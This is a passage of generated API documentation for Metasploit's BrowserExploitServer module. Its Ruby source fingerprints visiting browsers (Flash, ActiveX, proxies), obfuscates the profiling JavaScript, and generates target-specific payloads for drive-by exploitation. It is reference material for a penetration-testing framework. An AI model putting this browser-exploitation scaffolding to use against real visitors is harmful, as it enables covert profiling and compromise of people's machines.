var flashObject = createFlashObject(&#39;&lt;%=get_resource.chomp(&quot;/&quot;)%&gt;/&lt;%=@flash_swf%&gt;&#39;, {width: 1, height: 1}, {allowScriptAccess: &#39;always&#39;, Play: &#39;True&#39;});
// After 5s stop waiting and use the version retrieved with JS if there isn&#39;t anything
maxTimeout = setTimeout(function() {
if (intervalTimeout != null) {
doInterval = false
clearInterval(intervalTimeout)
}
if (!isEmpty(flashVersion)) {
d[&quot;flash&quot;] = flashVersion
}
sendInfo(d);
}, 5000);
// Check if there is a new flash version every 100ms
intervalTimeout = setInterval(function() {
if (!doInterval) {
clearInterval(intervalTimeout);
if (!isEmpty(flashVersion)) {
d[&quot;flash&quot;] = flashVersion
}
sendInfo(d);
}
}, 100);
document.body.appendChild(flashObject)
} else {
sendInfo(d)
}
}
</span><span class='tstring_end'>|</span></span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_result'>result</span><span class='lparen'>(</span><span class='id identifier rubyid_binding'>binding</span><span class='lparen'>(</span><span class='rparen'>)</span><span class='rparen'>)</span>
<span class='id identifier rubyid_js'>js</span> <span class='op'>=</span> <span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Exploitation</span><span class='op'>::</span><span class='const'>JSObfu</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span> <span class='id identifier rubyid_code'>code</span>
<span class='id identifier rubyid_js'>js</span><span class='period'>.</span><span class='id identifier rubyid_obfuscate'>obfuscate</span>
<span class='tstring'><span class='tstring_beg'>%Q|</span><span class='tstring_content'>
&lt;script&gt;
</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_js'>js</span><span class='embexpr_end'>}</span><span class='tstring_content'>
&lt;/script&gt;
&lt;noscript&gt;
&lt;img style=&quot;visibility:hidden&quot; src=&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_get_resource'>get_resource</span><span class='period'>.</span><span class='id identifier rubyid_chomp'>chomp</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>/</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='tstring_content'>/</span><span class='embexpr_beg'>#{</span><span class='ivar'>@noscript_receiver_page</span><span class='embexpr_end'>}</span><span class='tstring_content'>/&quot;&gt;
&lt;meta http-equiv=&quot;refresh&quot; content=&quot;1; url=</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_get_module_resource'>get_module_resource</span><span class='embexpr_end'>}</span><span class='tstring_content'>&quot;&gt;
&lt;/noscript&gt;
</span><span class='tstring_end'>|</span></span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="get_module_resource-instance_method">
#<strong>get_module_resource</strong> &#x21d2; <tt>String</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Returns the resource (URI) to the module to allow access to on_request_exploit</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>URI to the exploit page</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
153
154
155</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_exploit_server.rb', line 153</span>
<span class='kw'>def</span> <span class='id identifier rubyid_get_module_resource'>get_module_resource</span>
<span class='tstring'><span class='tstring_beg'>&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_get_resource'>get_resource</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span><span class='period'>.</span><span class='id identifier rubyid_chomp'>chomp</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>/</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='tstring_content'>/</span><span class='embexpr_beg'>#{</span><span class='ivar'>@exploit_receiver_page</span><span class='embexpr_end'>}</span><span class='tstring_content'>/</span><span class='tstring_end'>&quot;</span></span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="get_module_uri-instance_method">
#<strong>get_module_uri</strong> &#x21d2; <tt>String</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Returns the absolute URL to the modules resource that points to on_request_exploit</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>absolute URI to the exploit page</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
161
162
163</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_exploit_server.rb', line 161</span>
<span class='kw'>def</span> <span class='id identifier rubyid_get_module_uri'>get_module_uri</span>
<span class='tstring'><span class='tstring_beg'>&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_get_uri'>get_uri</span><span class='period'>.</span><span class='id identifier rubyid_chomp'>chomp</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>/</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='tstring_content'>/</span><span class='embexpr_beg'>#{</span><span class='ivar'>@exploit_receiver_page</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="get_payload-instance_method">
#<strong>get_payload</strong>(cli, browser_info) &#x21d2; <tt>String</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Generates a target-specific payload, should be called by the module</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>cli</span>
<span class='type'>(<tt>Socket</tt>)</span>
&mdash;
<div class='inline'>
<p>Socket for the browser</p>
</div>
</li>
<li>
<span class='name'>browser_info</span>
<span class='type'>(<tt>Hash</tt>)</span>
&mdash;
<div class='inline'>
<p>The target profile</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>The payload</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_exploit_server.rb', line 660</span>
<span class='kw'>def</span> <span class='id identifier rubyid_get_payload'>get_payload</span><span class='lparen'>(</span><span class='id identifier rubyid_cli'>cli</span><span class='comma'>,</span> <span class='id identifier rubyid_browser_info'>browser_info</span><span class='rparen'>)</span>
<span class='id identifier rubyid_arch'>arch</span> <span class='op'>=</span> <span class='id identifier rubyid_browser_info'>browser_info</span><span class='lbracket'>[</span><span class='symbol'>:arch</span><span class='rbracket'>]</span>
<span class='id identifier rubyid_platform'>platform</span> <span class='op'>=</span> <span class='id identifier rubyid_browser_info'>browser_info</span><span class='lbracket'>[</span><span class='symbol'>:os_name</span><span class='rbracket'>]</span>
<span class='comment'># Fix names for consistency so our API can find the right one
</span> <span class='comment'># Originally defined in lib/msf/core/constants.rb
</span> <span class='id identifier rubyid_platform'>platform</span> <span class='op'>=</span> <span class='id identifier rubyid_platform'>platform</span><span class='period'>.</span><span class='id identifier rubyid_gsub'>gsub</span><span class='lparen'>(</span><span class='tstring'><span class='regexp_beg'>/</span><span class='tstring_content'>^Mac OS X$</span><span class='regexp_end'>/</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>OSX</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_platform'>platform</span> <span class='op'>=</span> <span class='id identifier rubyid_platform'>platform</span><span class='period'>.</span><span class='id identifier rubyid_gsub'>gsub</span><span class='lparen'>(</span><span class='tstring'><span class='regexp_beg'>/</span><span class='tstring_content'>^Windows.*$</span><span class='regexp_end'>/</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Windows</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_p'>p</span> <span class='op'>=</span> <span class='id identifier rubyid_regenerate_payload'>regenerate_payload</span><span class='lparen'>(</span><span class='id identifier rubyid_cli'>cli</span><span class='comma'>,</span> <span class='id identifier rubyid_platform'>platform</span><span class='comma'>,</span> <span class='id identifier rubyid_arch'>arch</span><span class='rparen'>)</span>
<span class='id identifier rubyid_target_arch'>target_arch</span> <span class='op'>=</span> <span class='id identifier rubyid_get_target'>get_target</span><span class='period'>.</span><span class='id identifier rubyid_arch'>arch</span> <span class='op'>||</span> <span class='id identifier rubyid_arch'>arch</span>
<span class='kw'>unless</span> <span class='id identifier rubyid_p'>p</span><span class='period'>.</span><span class='id identifier rubyid_arch'>arch</span><span class='period'>.</span><span class='id identifier rubyid_all?'>all?</span> <span class='lbrace'>{</span> <span class='op'>|</span><span class='id identifier rubyid_e'>e</span><span class='op'>|</span> <span class='id identifier rubyid_target_arch'>target_arch</span><span class='period'>.</span><span class='id identifier rubyid_include?'>include?</span><span class='lparen'>(</span><span class='id identifier rubyid_e'>e</span><span class='rparen'>)</span> <span class='rbrace'>}</span>
<span class='id identifier rubyid_err'>err</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>The payload arch (</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_p'>p</span><span class='period'>.</span><span class='id identifier rubyid_arch'>arch</span> <span class='op'>*</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>, </span><span class='tstring_end'>&quot;</span></span><span class='embexpr_end'>}</span><span class='tstring_content'>) is incompatible with the target (</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_target_arch'>target_arch</span> <span class='op'>*</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\n</span><span class='tstring_end'>&quot;</span></span><span class='embexpr_end'>}</span><span class='tstring_content'>). </span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_err'>err</span> <span class='op'>&lt;&lt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Please check your payload setting.</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_raise'>raise</span> <span class='const'><span class='object_link'><a href="BrowserExploitServer/BESException.html" title="Msf::Exploit::Remote::BrowserExploitServer::BESException (class)">BESException</a></span></span><span class='comma'>,</span> <span class='id identifier rubyid_err'>err</span>
<span class='kw'>end</span>
<span class='kw'>return</span> <span class='id identifier rubyid_p'>p</span><span class='period'>.</span><span class='id identifier rubyid_encoded'>encoded</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="get_target-instance_method">
#<strong>get_target</strong> &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Returns the current target</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
167
168
169</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_exploit_server.rb', line 167</span>
<span class='kw'>def</span> <span class='id identifier rubyid_get_target'>get_target</span>
<span class='ivar'>@target</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="has_bad_activex?-instance_method">
#<strong>has_bad_activex?</strong>(ax) &#x21d2; <tt>Boolean</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Returns true if theres a bad ActiveX, otherwise false.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>ax</span>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>The raw activex the JavaScript detection will return in this format: "CLSID=&gt;Method=&gt;Boolean;"</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Boolean</tt>)</span>
&mdash;
<div class='inline'>
<p>True if there's a bad ActiveX, otherwise false</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
221
222
223
224
225
226
227
228
229
230</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_exploit_server.rb', line 221</span>
<span class='kw'>def</span> <span class='id identifier rubyid_has_bad_activex?'>has_bad_activex?</span><span class='lparen'>(</span><span class='id identifier rubyid_ax'>ax</span><span class='rparen'>)</span>
<span class='id identifier rubyid_ax'>ax</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span><span class='period'>.</span><span class='id identifier rubyid_split'>split</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>;</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_each'>each</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_a'>a</span><span class='op'>|</span>
<span class='id identifier rubyid_bool'>bool</span> <span class='op'>=</span> <span class='id identifier rubyid_a'>a</span><span class='period'>.</span><span class='id identifier rubyid_split'>split</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>=&gt;</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='lbracket'>[</span><span class='int'>2</span><span class='rbracket'>]</span>
<span class='kw'>if</span> <span class='id identifier rubyid_bool'>bool</span> <span class='op'>==</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>false</span><span class='tstring_end'>&#39;</span></span>
<span class='kw'>return</span> <span class='kw'>true</span>
<span class='kw'>end</span>
<span class='kw'>end</span>
<span class='kw'>false</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="has_proxy?-instance_method">
#<strong>has_proxy?</strong>(request) &#x21d2; <tt>Boolean</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Checks if the target is running a proxy</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>request</span>
<span class='type'>(<tt><span class='object_link'><a href="../../../Rex/Proto/Http/Request.html" title="Rex::Proto::Http::Request (class)">Rex::Proto::Http::Request</a></span></tt>)</span>
&mdash;
<div class='inline'>
<p>The HTTP request sent by the browser</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Boolean</tt>)</span>
&mdash;
<div class='inline'>
<p>True if found, otherwise false</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
348
349
350
351</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_exploit_server.rb', line 348</span>
<span class='kw'>def</span> <span class='id identifier rubyid_has_proxy?'>has_proxy?</span><span class='lparen'>(</span><span class='id identifier rubyid_request'>request</span><span class='rparen'>)</span>
<span class='id identifier rubyid_proxy_header_set'>proxy_header_set</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="#PROXY_REQUEST_HEADER_SET-constant" title="Msf::Exploit::Remote::BrowserExploitServer::PROXY_REQUEST_HEADER_SET (constant)">PROXY_REQUEST_HEADER_SET</a></span></span> <span class='op'>&amp;</span> <span class='id identifier rubyid_request'>request</span><span class='period'>.</span><span class='id identifier rubyid_headers'>headers</span><span class='period'>.</span><span class='id identifier rubyid_keys'>keys</span>
<span class='op'>!</span><span class='id identifier rubyid_proxy_header_set'>proxy_header_set</span><span class='period'>.</span><span class='id identifier rubyid_empty?'>empty?</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="initialize-instance_method">
#<strong>initialize</strong>(info = {}) &#x21d2; <tt>Object</tt>
</h3><table class="source_code">
<tr>
<td>
<pre class="lines">
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_exploit_server.rb', line 80</span>
<span class='kw'>def</span> <span class='id identifier rubyid_initialize'>initialize</span><span class='lparen'>(</span><span class='id identifier rubyid_info'>info</span><span class='op'>=</span><span class='lbrace'>{</span><span class='rbrace'>}</span><span class='rparen'>)</span>
<span class='kw'>super</span>
<span class='comment'># The mixin keeps &#39;target&#39; handy so module doesn&#39;t lose it.
</span> <span class='ivar'>@target</span> <span class='op'>=</span> <span class='kw'>self</span><span class='period'>.</span><span class='id identifier rubyid_respond_to?'>respond_to?</span><span class='lparen'>(</span><span class='symbol'>:target</span><span class='rparen'>)</span> <span class='op'>?</span> <span class='id identifier rubyid_target'>target</span> <span class='op'>:</span> <span class='kw'>nil</span>
<span class='comment'># Requirements are conditions that the browser must have in order to be exploited.
</span> <span class='ivar'>@requirements</span> <span class='op'>=</span> <span class='id identifier rubyid_extract_requirements'>extract_requirements</span><span class='lparen'>(</span><span class='kw'>self</span><span class='period'>.</span><span class='id identifier rubyid_module_info'>module_info</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>BrowserRequirements</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>||</span> <span class='lbrace'>{</span><span class='rbrace'>}</span><span class='rparen'>)</span>
<span class='ivar'>@info_receiver_page</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_rand_text_alpha'>rand_text_alpha</span><span class='lparen'>(</span><span class='int'>5</span><span class='rparen'>)</span>
<span class='ivar'>@exploit_receiver_page</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_rand_text_alpha'>rand_text_alpha</span><span class='lparen'>(</span><span class='int'>6</span><span class='rparen'>)</span>
<span class='ivar'>@noscript_receiver_page</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_rand_text_alpha'>rand_text_alpha</span><span class='lparen'>(</span><span class='int'>7</span><span class='rparen'>)</span>
<span class='ivar'>@flash_swf</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='embexpr_beg'>#{</span><span class='const'><span class='object_link'><a href="../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_rand_text_alpha'>rand_text_alpha</span><span class='lparen'>(</span><span class='int'>9</span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='tstring_content'>.swf</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_register_options'>register_options</span><span class='lparen'>(</span>
<span class='lbracket'>[</span>
<span class='const'><span class='object_link'><a href="../../OptBool.html" title="Msf::OptBool (class)">OptBool</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../../OptBool.html#initialize-instance_method" title="Msf::OptBool#initialize (method)">new</a></span></span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Retries</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='lbracket'>[</span><span class='kw'>false</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Allow the browser to retry the module</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='kw'>true</span><span class='rbracket'>]</span><span class='rparen'>)</span>
<span class='rbracket'>]</span><span class='comma'>,</span> <span class='const'><span class='object_link'><a href="../../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../Remote.html" title="Msf::Exploit::Remote (class)">Remote</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="" title="Msf::Exploit::Remote::BrowserExploitServer (module)">BrowserExploitServer</a></span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_register_advanced_options'>register_advanced_options</span><span class='lparen'>(</span><span class='lbracket'>[</span>
<span class='const'><span class='object_link'><a href="../../OptString.html" title="Msf::OptString (class)">OptString</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../../OptString.html#initialize-instance_method" title="Msf::OptString#initialize (method)">new</a></span></span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>CookieName</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='lbracket'>[</span><span class='kw'>false</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>The name of the tracking cookie</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='const'><span class='object_link'><a href="#DEFAULT_COOKIE_NAME-constant" title="Msf::Exploit::Remote::BrowserExploitServer::DEFAULT_COOKIE_NAME (constant)">DEFAULT_COOKIE_NAME</a></span></span><span class='rbracket'>]</span><span class='rparen'>)</span><span class='comma'>,</span>
<span class='const'><span class='object_link'><a href="../../OptString.html" title="Msf::OptString (class)">OptString</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../../OptString.html#initialize-instance_method" title="Msf::OptString#initialize (method)">new</a></span></span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>CookieExpiration</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='lbracket'>[</span><span class='kw'>false</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Cookie expiration in years (blank=expire on exit)</span><span class='tstring_end'>&quot;</span></span><span class='rbracket'>]</span><span class='rparen'>)</span><span class='comma'>,</span>
<span class='const'><span class='object_link'><a href="../../OptString.html" title="Msf::OptString (class)">OptString</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../../OptString.html#initialize-instance_method" title="Msf::OptString#initialize (method)">new</a></span></span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Custom404</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='lbracket'>[</span><span class='kw'>false</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>An external custom 404 URL (Example: http://example.com/404.html)</span><span class='tstring_end'>&quot;</span></span><span class='rbracket'>]</span><span class='rparen'>)</span>
<span class='rbracket'>]</span><span class='comma'>,</span> <span class='const'><span class='object_link'><a href="../../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../Remote.html" title="Msf::Exploit::Remote (class)">Remote</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="" title="Msf::Exploit::Remote::BrowserExploitServer (module)">BrowserExploitServer</a></span></span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="js_vuln_test-instance_method">
#<strong>js_vuln_test</strong> &#x21d2; <tt>String</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Returns custom Javascript to check if a vulnerability is present.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>custom Javascript to check if a vulnerability is present</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
682
683
684
685
686
687
688
689
690</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_exploit_server.rb', line 682</span>
<span class='kw'>def</span> <span class='id identifier rubyid_js_vuln_test'>js_vuln_test</span>
<span class='id identifier rubyid_all_reqs'>all_reqs</span> <span class='op'>=</span> <span class='kw'>self</span><span class='period'>.</span><span class='id identifier rubyid_module_info'>module_info</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>BrowserRequirements</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>||</span> <span class='lbrace'>{</span><span class='rbrace'>}</span>
<span class='kw'>if</span> <span class='id identifier rubyid_all_reqs'>all_reqs</span><span class='lbracket'>[</span><span class='symbol'>:vuln_test</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_present?'>present?</span>
<span class='id identifier rubyid_code'>code</span> <span class='op'>=</span> <span class='id identifier rubyid_all_reqs'>all_reqs</span><span class='lbracket'>[</span><span class='symbol'>:vuln_test</span><span class='rbracket'>]</span> <span class='op'>+</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>;return !!this.is_vuln;</span><span class='tstring_end'>&#39;</span></span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Function((</span><span class='tstring_end'>&#39;</span></span><span class='op'>+</span><span class='const'>JSON</span><span class='period'>.</span><span class='id identifier rubyid_generate'>generate</span><span class='lparen'>(</span><span class='symbol'>:code</span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_code'>code</span><span class='rparen'>)</span><span class='op'>+</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>).code)()</span><span class='tstring_end'>&#39;</span></span>
<span class='kw'>else</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>true</span><span class='tstring_end'>&#39;</span></span>
<span class='kw'>end</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="load_swf_detection-instance_method">
#<strong>load_swf_detection</strong> &#x21d2; <tt>Object</tt>
</h3><table class="source_code">
<tr>
<td>
<pre class="lines">
529
530
531
532
533
534</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_exploit_server.rb', line 529</span>
<span class='kw'>def</span> <span class='id identifier rubyid_load_swf_detection'>load_swf_detection</span>
<span class='id identifier rubyid_path'>path</span> <span class='op'>=</span> <span class='op'>::</span><span class='const'>File</span><span class='period'>.</span><span class='id identifier rubyid_join'>join</span><span class='lparen'>(</span><span class='const'><span class='object_link'><a href="../../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../Config.html" title="Msf::Config (class)">Config</a></span></span><span class='period'>.</span><span class='id identifier rubyid_data_directory'><span class='object_link'><a href="../../Config.html#data_directory-class_method" title="Msf::Config.data_directory (method)">data_directory</a></span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>flash_detector</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>flashdetector.swf</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_swf'>swf</span> <span class='op'>=</span> <span class='op'>::</span><span class='const'>File</span><span class='period'>.</span><span class='id identifier rubyid_open'>open</span><span class='lparen'>(</span><span class='id identifier rubyid_path'>path</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>rb</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span> <span class='lbrace'>{</span> <span class='op'>|</span><span class='id identifier rubyid_f'>f</span><span class='op'>|</span> <span class='id identifier rubyid_swf'>swf</span> <span class='op'>=</span> <span class='id identifier rubyid_f'>f</span><span class='period'>.</span><span class='id identifier rubyid_read'>read</span> <span class='rbrace'>}</span>
<span class='id identifier rubyid_swf'>swf</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="on_request_exploit-instance_method">
#<strong>on_request_exploit</strong>(cli, request, browser_info) &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Overriding method. The module should override this.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>cli</span>
<span class='type'>(<tt>Socket</tt>)</span>
&mdash;
<div class='inline'>
<p>Socket for the browser</p>
</div>
</li>
<li>
<span class='name'>request</span>
<span class='type'>(<tt><span class='object_link'><a href="../../../Rex/Proto/Http/Request.html" title="Rex::Proto::Http::Request (class)">Rex::Proto::Http::Request</a></span></tt>)</span>
&mdash;
<div class='inline'>
<p>The HTTP request sent by the browser</p>
</div>
</li>
<li>
<span class='name'>browser_info</span>
<span class='type'>(<tt>Hash</tt>)</span>
&mdash;
<div class='inline'>
<p>The target profile</p>
</div>
</li>
</ul>
<p class="tag_title">Raises:</p>
<ul class="raise">
<li>
<span class='type'>(<tt>NoMethodError</tt>)</span>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
632
633
634</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_exploit_server.rb', line 632</span>
